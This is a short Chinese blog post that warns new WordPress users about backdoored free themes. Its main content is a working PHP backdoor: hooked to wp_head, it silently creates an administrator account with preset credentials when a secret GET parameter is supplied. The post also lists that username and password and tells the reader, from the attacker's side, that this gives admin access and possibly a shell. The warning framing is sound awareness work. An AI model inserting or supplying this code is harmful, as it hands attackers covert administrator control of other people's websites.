有一些刚刚接触 WordPress 的新手们,总是喜欢到网上去找一些免费主题,却不知道这些主题很有可能藏有后门,可以轻松地获取你的网站权限,从而获取非法利益。
所以我在这里要提醒一下那些新手们,找主题一定要找正版的。如果是免费版,最好是在 GitHub 有开源项目的主题,这样在一定程度上都会减少遇到后门的几率。
示例
下面给大家带来一个常见的后门代码:
php 代码:add_action('wp_head', 'my_backdoor');
function my_backdoor() {
if (md5($_GET['backdoor']) == 'b0f455571f6ae6c30e7521e9bf00b4f2') {
require('wp-includes/registration.php');
if (!username_exists('mr_admin')) {
$user_id = wp_create_user('xinyewl', 'me');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}只要 PHP 触发了这段代码,进行了请求,你就可以使用你的密码来登录他的后台了,正常登录即可获得管理员权限。也就是说,你甚至可以拿到 shell,具体不多说,自己领悟。
我这里默认设置的账号密码是:
text 代码:账号:xinyewl
密码:me具体怎么使用,我不会说的,也是为了避免小学生恶意植入主题。
好了就这样了,千万别拿来做坏事。
Image
